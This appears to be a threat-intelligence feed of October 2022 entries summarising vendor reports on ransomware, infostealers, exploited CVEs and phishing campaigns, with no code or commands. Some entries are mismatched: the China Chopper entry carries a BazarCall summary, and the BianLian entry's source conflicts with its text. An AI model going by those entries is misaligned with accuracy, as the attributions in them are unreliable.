—
- Intel Source:
- CERT-UA
- Intel Name:
- Cuba_Ransomware_Targeting_Ukrainian_Government_Agencies
- Date of Scan:
- 2022-10-25
- Impact:
- LOW
- Summary:
- CERT-UA researchers have issued an alert about potential Cuba Ransomware attacks against critical networks in the country. They observed a new wave of phishing emails that impersonated the Press Service of the General Staff of the Armed Forces of Ukraine, urging recipients to click on an embedded link.
—
- Intel Source:
- Cyble
- Intel Name:
- Infostealer_Distributing_Via_Free_and_Cracked_Software
- Date of Scan:
- 2022-10-24
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified the new Temp stealer spreading via free and cracked software.
Source:
https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/
—
- Intel Source:
- ASEC
- Intel Name:
- Various_Remote_Control_Tools_attacks
- Date of Scan:
- 2022-10-24
- Impact:
- LOW
- Summary:
- Researchers from ASEC discovered multiple attack campaigns abusing various remote control tools to steal information, install backdoors, and deploy malware.
—
- Intel Source:
- Wordfence
- Intel Name:
- Zero_Day_Vulnerabilities_in_Microsoft_Exchange_Server
- Date of Scan:
- 2022-10-21
- Impact:
- MEDIUM
- Summary:
- Wordfence researchers have observed exploit attempts targeting two zero-day vulnerabilities in Microsoft Exchange Server tracked as CVE-2022-41040 and CVE-2022-41082. A total of 1,658,281 exploit attempts were observed across their network of 4 million protected websites due to these vulnerabilities.
Source:
https://www.wordfence.com/blog/2022/10/two-weeks-of-monitoring-proxynotshell-threat-activity/
—
- Intel Source:
- Wordfence
- Intel Name:
- Hackers_Exploiting_Text4Shell_Vulnerability
- Date of Scan:
- 2022-10-21
- Impact:
- HIGH
- Summary:
- Researchers from Wordfence have started detecting exploitation attempts targeting the newly disclosed flaw in Apache Commons Text on October 18, 2022. The vulnerability, tracked as CVE-2022-42889 aka Text4Shell, has been assigned a severity ranking of 9.8 out of a possible 10.0 on the CVSS scale and affects versions 1.5 through 1.9 of the library.
—
- Intel Source:
- Fortinet
- Intel Name:
- The_multiple_malware_attacks_on_VMware_Vulnerability
- Date of Scan:
- 2022-10-21
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet discovered multiple malware campaigns leveraging CVE-2022-22954 to deploy Mirai, RAR1ransom, GuardMiner.
Source:
https://www.fortinet.com/blog/threat-research/multiple-malware-campaigns-target-vmware-vulnerability
—
- Intel Source:
- Checkpoint
- Intel Name:
- Black_Basta_and_the_Unnoticed_Delivery
- Date of Scan:
- 2022-10-20
- Impact:
- MEDIUM
- Summary:
- In a recent Black Basta incident spotted by the Checkpoint Incident Response Team, researchers observed that the operators behind this ransomware also have an impressive organizational structure.
Source:
https://research.checkpoint.com/2022/black-basta-and-the-unnoticed-delivery/
—
- Intel Source:
- TrendMicro
- Intel Name:
- WatchDog_Hackers_Possibly_Impersonating_TeamTNT
- Date of Scan:
- 2022-10-20
- Impact:
- LOW
- Summary:
- Researchers at TrendMicro have found that the attack patterns are similar to the arsenal used by TeamTNT, but that it is likely a different cryptocurrency mining group, known as WatchDog, is deploying the code.
Source:
https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html
—
- Intel Source:
- Mandiant
- Intel Name:
- A_New_Variant_of_URSNIF_Malware
- Date of Scan:
- 2022-10-20
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have observed URSNIF malware shifting its focus from banking fraud to ransomware and data theft.
Source:
https://www.mandiant.com/resources/blog/rm3-ldr4-ursnif-banking-fraud
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- LAZARUS_attacks_using_spear_phishing_emails
- Date of Scan:
- 2022-10-19
- Impact:
- LOW
- Summary:
- The Lazarus campaign targeted an aerospace company employee in the Netherlands and a political journalist in Belgium. The campaign started with spear phishing emails. These came in the form of fake Amazon emails. The main goal of the attackers was to steal data.
Source:
https://www.welivesecurity.com/deutsch/2022/10/18/lazarus-greift-die-niederlande-und-belgien-an/
—
- Intel Source:
- SafeBreach
- Intel Name:
- New_PowerShell_Backdoor_Fully_Undetectable
- Date of Scan:
- 2022-10-19
- Impact:
- MEDIUM
- Summary:
- Using a novel method of disguising itself as part of the Windows update process, researchers from SafeBreach have detected a new fully undetectable (FUD) PowerShell backdoor.
—
- Intel Source:
- Fortinet
- Intel Name:
- A_Latest_Edition_of_The_New_Royal_Ransomware
- Date of Scan:
- 2022-10-18
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs obtained data on a new variant that is gaining interest in the OSINT community. Royal is a relatively new operation, having been around since at least the start of 2022. The target of this malware is Microsoft Windows platforms and Windows users. The aim is to gain access to a victim’s environment, encrypt their data, and extort a ransom to return access to any files touched.
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware
—
- Intel Source:
- Quick Heal
- Intel Name:
- Diving_Deep_into_New_64_Bit_Emotet_Modules
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- Researchers from QuickHeal have analyzed the new 64-bit Emotet modules and their differences from the previous versions.
Source:
https://blogs.quickheal.com/a-deep-dive-into-new-64-bit-emotet-modules/
—
- Intel Source:
- Symantec
- Intel Name:
- CuckooBees_Campaign_Targeting_Organizations_in_Hong_Kong
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- According to Symantec researchers, CuckooBee is continuing to target Hong Kong-based organizations. As part of this ongoing campaign, Spyder Loader (Trojan.Spyload) malware was installed on the networks of victims.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Python_Obfuscation_for_Dummies
- Date of Scan:
- 2022-10-18
- Impact:
- LOW
- Summary:
- SANS researchers analyzed several malicious Python scripts with the same appearance and end strings. Due to the obfuscation technique, we are unable to figure out what the script is used for without executing it in a sandbox.
—
- Intel Source:
- STR
- Intel Name:
- Potential_C2_Seeder_Queries_18102022
- Date of Scan:
- 2022-10-18
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
https://github.com/str-int-repo/str-seeder-behavior-queries
—
- Intel Source:
- Microsoft
- Intel Name:
- Prestige_Ransomware_Targeting_Organizations_in_Ukraine_and_Poland
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from Microsoft have identified new Prestige ransomware that is being used in attacks aimed at transportation and logistics organizations in Ukraine and Poland.
—
- Intel Source:
- Palo Alto
- Intel Name:
- The_Connection_Between_REvil_and_Ransom_Cartel_Ransomware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from Palo Alto have done a deep analysis of Ransom Cartel ransomware, as well as an assessment of the possible connections between REvil and Ransom Cartel ransomware.
Source:
https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/?web_view=true
—
- Intel Source:
- VMware
- Intel Name:
- LockBit_3.0_is_in_the_spotlight_again
- Date of Scan:
- 2022-10-17
- Impact:
- MEDIUM
- Summary:
- VMware researchers observed that LockBit continues its rise to the top of the ransomware ecosystem as the leading ransomware strain. It was announced that the builder for the ransomware was leaked by @ali_qushji and is available for download from GitHub. This leaked source allows complete and unhindered analysis, but it also means that many new groups are emerging, using the same or modified versions of LockBit 3.0 built from this builder.
Source:
https://blogs.vmware.com/security/2022/10/lockbit-3-0-also-known-as-lockbit-black.html
—
- Intel Source:
- Palo Alto
- Intel Name:
- A_rise_of_threats_from_newly_observed_domains
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Last year, Palo Alto Networks created a proactive detector that recognized malicious domains and identified them before they started their malicious activities. The Palo Alto Networks detector extracts newly observed domains (NODs) from passive DNS and proactively detects potential cybercriminal activity among them. The system scans newly registered domains (NRDs) and detects their potential network abuse.
Source:
https://unit42.paloaltonetworks.com/malicious-newly-observed-domains/
—
- Intel Source:
- Splunk
- Intel Name:
- A_new_adversary_simulation_tool_Brute_Ratel_C4_(BRC4)
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- The Splunk Threat Research Team (STRT) shared their research on captured Brute Ratel Badgers (agents), which they used to create a YARA rule and identify more samples on VirusTotal. The Brute Ratel tool is growing in popularity among red teamers and, most recently, adversaries. The researchers also reversed a sample to understand its functions and analyzed it to help defenders identify behaviors related to Brute Ratel.
—
- Intel Source:
- AT&T
- Intel Name:
- SocGholish_Drive_by_Compromise
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- AT&T researchers have analyzed an alert related to SocGholish that is providing fake software updates.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- COVID_Phishing_Campaign
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed phishing emails about Covid asking all suppliers to declare their vaccination status, although the date on them is almost 1 year old.
—
- Intel Source:
- Cloudsek
- Intel Name:
- Diving_Deep_into_BlueSky_Ransomware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- CloudSEK researchers have done a deep analysis of BlueSky Ransomware that covers the technical aspects: Procedure for privilege escalation, Persistence, Encryption mechanism, and Evasion techniques.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_new_Powershell_script_dropps_a_malware
- Date of Scan:
- 2022-10-17
- Impact:
- LOW
- Summary:
- Researchers from SANS have hunted and found a malicious PowerShell script that drops malware on the victim’s computer. It is not a new one; it is called “autopowershell.ps1”. This malware tries to keep interactions with the file system to a minimum. But, to achieve persistence, it must write something to the disk. Most of the time, this is done through registry keys.
Source:
https://isc.sans.edu/diary/Fileless+Powershell+Dropper/29156/
—
- Intel Source:
- Wordfence
- Intel Name:
- A_critical_authentication_bypass_vulnerability_CVE_2022_40684
- Date of Scan:
- 2022-10-14
- Impact:
- HIGH
- Summary:
- The Wordfence Threat Intelligence team recorded several exploit attempts and requests originating from malicious IP addresses, targeting CVE-2022-40684 across their network. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild.
—
- Intel Source:
- Zscaler
- Intel Name:
- Ducktail_infostealer_came_back_again
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- The Zscaler ThreatLabz research team has come across a new campaign of the Ducktail Infostealer with a new PHP version, which is being vigorously distributed by masquerading as a free/cracked application installer for a variety of applications, including games, Microsoft Office applications, Telegram, and others.
—
- Intel Source:
- Cyble
- Intel Name:
- InfoStealer_Spreading_via_AnyDesk_Phishing_Site
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a phishing site impersonating the genuine AnyDesk website. The initial infection starts when the user clicks the “Downloads” button on the phishing site, which downloads a malicious file named “Anydesk.exe” from the remote server.
Source:
https://blog.cyble.com/2022/10/13/mitsu-stealer-distributed-via-anydesk-phishing-site/
—
- Intel Source:
- Blackberry
- Intel Name:
- BianLian_Ransomware_encrypts_withan_immediate_speed
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- The researchers from Cyble observed that the BianLian ransomware raises the severity level by encrypting files with exceptional speed. The threat actors created the new BianLian ransomware version in the Go programming language (aka Golang) for a variety of reasons, particularly its robust support for concurrency, which allows various malicious functions to run independently of each other and speeds up the attack.
Source:
https://blogs.blackberry.com/en/2022/10/bianlian-ransomware-encrypts-files-in-the-blink-of-an-eye
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Deep_Analysis_of_QBot_HTML_File
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Researchers from SANS have analyzed a malicious QBot HTML file that contains BASE64 images with malware.
Source:
https://isc.sans.edu/diary/Analysis+of+a+Malicious+HTML+File+QBot/29146/
—
- Intel Source:
- Uptycs
- Intel Name:
- AgentTesla_Malware_Distributing_via_WSHRAT_Malware
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- Uptycs researchers have identified a new Agent Tesla malware attack campaign and observed that the threat actors are now trying to drop Agent Tesla malware via WSHRAT malware.
Source:
https://www.uptycs.com/blog/wshrat-acting-as-a-dropper-for-agent-tesla
—
- Intel Source:
- Palo Alto
- Intel Name:
- Ransom_Cartel_ransomware_performance_overlaps_with_REvil_ransomware
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- Palo Alto shared their analysis of Ransom Cartel ransomware. Unit 42 has observed Ransom Cartel encrypting both Windows and Linux VMware ESXi servers in attacks on corporate networks. Ransom Cartel uses double extortion and some of the same TTPs observed in other ransomware attacks, but this ransomware also uses less common tools, notably DonPAPI.
Source:
https://unit42.paloaltonetworks.com/ransom-cartel-ransomware/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Prynt_malware_injection_techniques
- Date of Scan:
- 2022-10-14
- Impact:
- LOW
- Summary:
- The CYFIRMA Research team analysed an infostealer “Prynt” sample, which was found to be written in C/C++ as a 32-bit console binary. The infostealer “Prynt” has the capability to steal system information from infected systems, including files from targeted directories and credentials from web browsers.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- The_examination_of_Wiper_Malware_Part_4
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- Researchers from CrowdStrike have covered some of the rarely used “helper” techniques implemented by wipers, which achieve secondary goals or facilitate a smaller portion of the wiping process.
Source:
https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-4/
—
- Intel Source:
- Cyble
- Intel Name:
- A_spreading_of_RedLine_Stealer
- Date of Scan:
- 2022-10-14
- Impact:
- MEDIUM
- Summary:
- The Cyble Research team uncovered a phishing site that impersonates the genuine “Convertio” online tool website, which converts files into different file formats, including documents, images, spreadsheets, eBooks, archives, presentations, audio, video, etc. The phishing website is well-designed and appears similar to the legitimate Convertio website.
Source:
https://blog.cyble.com/2022/10/14/online-file-converter-phishing-page-spreads-redline-stealer/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- New_Attack_Technique_Leveraging_Alchimist_and_Insekt_Malware
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from Cisco have discovered a new attack framework in the wild, including a command and control (C2) tool called “Alchimist” and a new malware “Insekt” written in GoLang, targeting Windows, Mac, and Linux.
Source:
https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html
—
- Intel Source:
- SentinelOne
- Intel Name:
- WIP19_Group_Targeting_Telecommunication_and_IT_Industries
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- SentinelOne researchers have tracked a new Chinese-speaking threat group known as WIP19 that is targeting telecommunications and IT service providers in the Middle East and Asia.
—
- Intel Source:
- ASEC
- Intel Name:
- Various_malicious_remote_control_tools
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that remote control tools commonly used by ordinary users are being abused in attacks. This allows attackers to bypass the security product’s detection and take control of the infected system in a GUI environment.
—
- Intel Source:
- SentinelOne
- Intel Name:
- 8220_Gang_continues_to_target_misconfigured_cloud_workloads
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- SentinelOne noted that 8220 Gang had expanded its cloud service botnet and the group has rotated its attack infrastructure and continued to absorb compromised hosts into its botnet and to distribute cryptocurrency mining malware. 8220 Gang identifies targets via scanning for misconfigured or vulnerable hosts on the public internet.
Source:
https://www.sentinelone.com/blog/8220-gang-cloud-botnet-targets-misconfigured-cloud-workloads/
—
- Intel Source:
- Symantec
- Intel Name:
- Budworm_Hackers_Targeting_US_Organization
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Researchers from Symantec Threat Hunter team have identified APT group named Budworm targeting an unnamed U.S. state legislature for the first time.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/budworm-espionage-us-state
—
- Intel Source:
- ASEC
- Intel Name:
- GuLoader_malware_disguised_as_Word
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that the GuLoader malware is being distributed to domestic corporate users.
—
- Intel Source:
- HP Threat Research
- Intel Name:
- Magniber_Ransomware_continues_targeting_Home_Users_with_Fake_Software_Updates
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- Researchers from HP shared their analysis of a Magniber ransomware campaign that has been running since September and targets home users by masquerading as software updates. The attackers used detection evasion techniques, such as running the ransomware in memory, bypassing User Account Control (UAC) in Windows, and other detection-bypass techniques.
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_ongoing_tech_support_scam
- Date of Scan:
- 2022-10-13
- Impact:
- LOW
- Summary:
- Cyble Research & Intelligence Labs researchers identified a new ongoing tech support scam in which the threat actor has developed various phishing websites that impersonate Microsoft support sites and show a fake Windows Defender alert.
Source:
https://blog.cyble.com/2022/10/11/massive-tech-support-scam-exposed/
—
- Intel Source:
- ASEC
- Intel Name:
- Top_malware_statistics_for_last_two_weeks
- Date of Scan:
- 2022-10-13
- Impact:
- MEDIUM
- Summary:
- The ASEC team analyzed and collected statistics on the top 5 malware families from September 26th, 2022 (Monday) to October 2nd, 2022 (Sunday).
—
- Intel Source:
- ASEC
- Intel Name:
- GlobeImposter_Ransomware_Targeting_Vulnerable_MS_SQL_Servers
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that the GlobeImposter ransomware, which targets vulnerable MS-SQL servers, is being distributed in Korea.
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distribution_Method_Changed_from_Excel_Macro_to_ISO_Files
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- ASEC researchers have identified that Qakbot, an online banking malware, has changed its distribution method from Excel 4.0 Macro to ISO files.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Black_Basta_Ransomware_Using_QAKBOT_Brute_Ratel_and_Cobalt_Strike
- Date of Scan:
- 2022-10-12
- Impact:
- MEDIUM
- Summary:
- Researchers from Trendmicro have analyzed QAKBOT-related cases that lead to Brute Ratel C4 and Cobalt Strike payloads and that can be attributed to the threat actors behind the Black Basta ransomware.
—
- Intel Source:
- ASEC
- Intel Name:
- Lazarus_Group_Leveraging_DLL_Side-Loading_Technique
- Date of Scan:
- 2022-10-12
- Impact:
- MEDIUM
- Summary:
- ASEC researchers have discovered that the Lazarus group is using the DLL Side-Loading attack technique (T1574.002), abusing legitimate applications in the initial compromise stage to proceed to the next stage of their attack process.
—
- Intel Source:
- Fortinet
- Intel Name:
- MS_Excel_File_Delivering_Multi_Stage_Cobalt_Strike_Loader
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- FortiGuard Labs researchers have discovered a malicious Excel document masquerading as a salary calculation tool for Ukrainian troops. It executes evasive multi-stage loaders, eventually resulting in the victim’s device being infected with Cobalt Strike Beacon malware.
—
- Intel Source:
- Mandiant
- Intel Name:
- Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
- Date of Scan:
- 2022-10-12
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered and thoroughly tested the phishing-as-a-service (PhaaS) platform named ‘Caffeine’. During an investigation, a large-scale phishing campaign was found running through the service, targeting one of Mandiant’s clients to steal Microsoft 365 account credentials.
Source:
https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
—
- Intel Source:
- TrendMicro
- Intel Name:
- A_Detailed_Analysis_of_Malicious_Tools_Used_by_Cyber_Espionage_Group_Earth_Aughisky
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Trendmicro researchers have analyzed the Earth Aughisky threat group and tools with components that have yet to be identified, reported, or attributed to the group. The group is known for its ability to abuse legitimate accounts, software, applications, and other weaknesses in the network design and infrastructure for its own ends.
Source:
https://www.trendmicro.com/en_us/research/22/j/tracking-earth-aughiskys-malware-and-changes.html
—
- Intel Source:
- Mandiant
- Intel Name:
- Caffeine_Service_Allows_Anyone_Launch_Microsoft_365_Phishing_Attacks
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Researchers from Mandiant have discovered and thoroughly tested the phishing-as-a-service (PhaaS) platform named ‘Caffeine’. During an investigation, a large-scale phishing campaign was found running through the service, targeting one of Mandiant’s clients to steal Microsoft 365 account credentials.
Source:
https://www.mandiant.com/resources/blog/caffeine-phishing-service-platform
—
- Intel Source:
- VMware
- Intel Name:
- Emotet_Malware_Using_Evasion_Techniques_in_Recent_Attacks
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- Researchers from VMware have analyzed the threat actors associated with the notorious Emotet malware, who are continually shifting their tactics and command-and-control (C2) infrastructure to escape detection.
—
- Intel Source:
- X-Junior
- Intel Name:
- The_Snake_Keylogger_malware_analyses
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- The researcher from X-Junior provided a deep analysis of Snake Keylogger in his post. Snake Keylogger is a malware developed using .NET, and its purpose is stealing sensitive information from a victim’s device: saved credentials, the victim’s keystrokes, screenshots of the victim’s screen, and clipboard data.
Source:
https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html#introduction
—
- Intel Source:
- WeliveSecurity
- Intel Name:
- POLONIUM_threat_group_attacks_on_Israel_continue
- Date of Scan:
- 2022-10-11
- Impact:
- LOW
- Summary:
- ESET researchers shared their findings about POLONIUM, an APT group whose initial compromise vector is unknown. According to ESET telemetry, POLONIUM has used custom backdoors and cyberespionage tools to target more than a dozen organizations in Israel, including engineering, information technology, law, communications, branding and marketing, media, insurance, and social services.
Source:
https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/
—
- Intel Source:
- Inquest
- Intel Name:
- A_close_look_at_an_item_called_CustomXMLParts
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- In this post the researcher covered an item called “CustomXMLParts”. It is an XML container that stores arbitrary data for use in the document. Its intended purpose appears to be giving the developer a way to change the formatting of an Office document in ways not already available, or to add functionality.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Malware_Analysis_Report:_HyperBro
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers at CISA gathered malware samples from live incident responses loaded with HyperBro, a Remote Access Trojan that gives attackers a backdoor.
Source:
https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277b
—
- Intel Source:
- Cyble
- Intel Name:
- Modified_FiveM_Spoofer_activity
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Cyble researchers have continuously monitored phishing campaigns that distribute different malware families, and recently they identified a malicious site that redirects the user to a Discord channel where the threat actor announces the sale of a spoofer to get unbanned from FiveM. FiveM is a mod project that allows gamers to play Grand Theft Auto V (GTA5) with custom multiplayer modes on customized dedicated servers.
Source:
https://blog.cyble.com/2022/10/07/modified-fivem-spoofer-targeting-gamers/
—
- Intel Source:
- Checkmarx
- Intel Name:
- The_installations_of_the_malicious_NPM_packages_by_“LofyGang”_group
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Checkmarx discovered around 200 malicious NPM packages with thousands of installations linked to an attack group called “LofyGang”. This group has been active for over a year with multiple goals, such as obtaining credit card information, streaming service accounts (e.g. Disney+), Minecraft accounts, Discord “Nitro” (premium) upgrades, and more.
—
- Intel Source:
- Team-cymru
- Intel Name:
- IcedID_campaign_metrics
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- Team Cymru researchers put together detailed metrics on IcedID campaigns and Stage 1 C2 infrastructure, to shed light on behaviors and details not often available. These metrics are numbers the threat actors are watching as well and, just as for any other business, may influence their future actions.
Source:
https://www.team-cymru.com/post/a-visualizza-into-recent-icedid-campaigns
—
- Intel Source:
- Rewterz
- Intel Name:
- LockBit_3.0_Ransomware_Spreads_again
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers discovered that LockBit 3.0 ransomware is being delivered in Word document format while masquerading as job application emails in NSIS format. The particular distribution method has not yet been discovered, but given that the file names include people’s names, such as ‘Lim Gyu Min.docx’ or ‘Jeon Chae Rin.docx,’ it is possible that they were spread disguised as job applications, as in previous occurrences.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Another_look_at_recent_IcedID_campaigns
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- A researcher from ISC SANS had another look at recent IcedID campaigns using PNG files to hide their malicious payload.
—
- Intel Source:
- CISA
- Intel Name:
- The_China_Chopper_webshells_detailed_malware_report
- Date of Scan:
- 2022-10-10
- Impact:
- LOW
- Summary:
- The BazarCall campaigns were found to be most active in the United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are cold called by the attacker, except in BazarCall’s case, targeted users must dial the number themselves.
—
- Intel Source:
- CISA
- Intel Name:
- CISA_Malware_Analysis_Report_CovalentStealer
- Date of Scan:
- 2022-10-10
- Impact:
- MEDIUM
- Summary:
- Researchers at CISA gathered malware samples from live incident responses loaded with CovalentStealer, which is designed to identify and exfiltrate files to a remote server.
Source:
https://www.cisa.gov/uscert/ncas/analysis-reports/ar22-277a
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Exploiting_CVE_2017_11882_and_Delivering_Multiple_Malware
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers at FortiGuard have found a malicious file embedded in an Excel document. Embedded files with randomized file names exploit vulnerability CVE-2017-11882 to execute malicious code that delivers and executes malware on victims’ devices.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Domain_Generation_Algorithm_tactic_used_by_malware
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- A researcher from ISC SANS discovered a simple malicious PowerShell script that implements a backdoor with DGA capability. DGA (“Domain Generation Algorithm”) is a popular tactic used by malware to make connections to its C2 stealthier and more difficult to block. The idea is to generate domain names periodically and use them during the defined period.
Source:
https://isc.sans.edu/diary/Powershell+Backdoor+with+DGA+Capability/29122/
—
- Intel Source:
- Medium
- Intel Name:
- A_novel_backdoor_malware_targeting_Microsoft_SQL_servers
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- DCSO CyTec recently found a novel backdoor malware targeting Microsoft SQL servers. The malware comes in the form of an “Extended Stored Procedure” DLL, a special type of extension used by Microsoft SQL servers. Once loaded into a server by an attacker, it is controlled solely using SQL queries.
Source:
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
—
- Intel Source:
- Trellix
- Intel Name:
- BazarCall_social_engineering_tactics
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- The BazarCall campaigns were found to be most active in the United States and Canada. BazarCall campaigns forgo malicious links or attachments in email messages in favor of phone numbers that recipients are misled into calling. It’s a technique reminiscent of vishing and tech support scams where potential victims are cold called by the attacker, except in BazarCall’s case, targeted users must dial the number themselves.
—
- Intel Source:
- Cyble
- Intel Name:
- Fake_Ransomware_Spreading_via_Phishing_Emails
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers from Cyble have identified a website that is distributing a fake ransomware executable. Instead of encrypting files, the fake ransomware changes file names and extensions, drops ransom notes, and demands that victims pay a ransom as usual.
Source:
https://blog.cyble.com/2022/10/06/fake-ransomware-infection-under-widespread/
—
- Intel Source:
- SpiderLabs
- Intel Name:
- Phishers_Using_HTML_Attachments_to_Steal_Sensitive_Information
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- According to Trustwave SpiderLabs, HTML file attachments have become a common occurrence in spam traps. As phishing spam is often a vehicle for malware delivery, this is not uncommon.
—
- Intel Source:
- BlackBerry
- Intel Name:
- Mustang_Panda_APT_Group_Leveraging_PlugX_Malware_Family
- Date of Scan:
- 2022-10-07
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have discovered a campaign by an APT group called Mustang Panda that is leveraging the PlugX malware family to target the Southeast Asian state of Myanmar.
—
- Intel Source:
- Fortinet
- Intel Name:
- Phishing_Campaigns_in_Q3_Delivering_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have elaborated on multiple phishing campaigns in Q3 delivering malware, targeting Windows users.
Source:
https://www.fortinet.com/blog/threat-research/delivery-of-malware-phishing-campaigns-in-q3-2022
—
- Intel Source:
- BitSight
- Intel Name:
- A_Deep_Examination_of_PseudoManuscrypt_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- The BitSight researchers have analyzed PseudoManuscrypt malware. They describe how researchers went from unknown DGA-like domains to sinkholes and mimicked a relatively recent botnet that has infected nearly 500,000 machines (2.2M unique IP addresses) across at least 40 countries in the last 8 months, and has an estimated botnet size of around 50,000 machines.
Source:
https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1
—
- Intel Source:
- BitDefender
- Intel Name:
- DLL_Side_Loading_Attack_Leveraging_OneDrive_Application
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- Researchers from BitDefender have identified and documented a cryptojacking campaign exploiting known DLL sideloading vulnerabilities in Microsoft OneDrive.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_LilithBot_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- LOW
- Summary:
- Zscaler researchers have discovered a sample of multi-function malware called “LilithBot” which is associated with the Eternity threat group (a.k.a. EternityTeam; Eternity Project), linked to the Russian “Jester Group,” that has been active since at least January 2022.
—
- Intel Source:
- DCSO CyTec Blog
- Intel Name:
- Over_250_Microsoft_SQL_Servers_Infected_By_New_Maggie_Malware
- Date of Scan:
- 2022-10-06
- Impact:
- MEDIUM
- Summary:
- DCSO CyTec researchers have identified a new malware, named Maggie, that has already infected over 250 Microsoft SQL servers worldwide. Most of the infected instances are in South Korea, India, Vietnam, China, Russia, Thailand, Germany, and the United States.
Source:
https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
—
- Intel Source:
- Securelist
- Intel Name:
- The_OnionPoison_malicious_campaign
- Date of Scan:
- 2022-10-05
- Impact:
- LOW
- Summary:
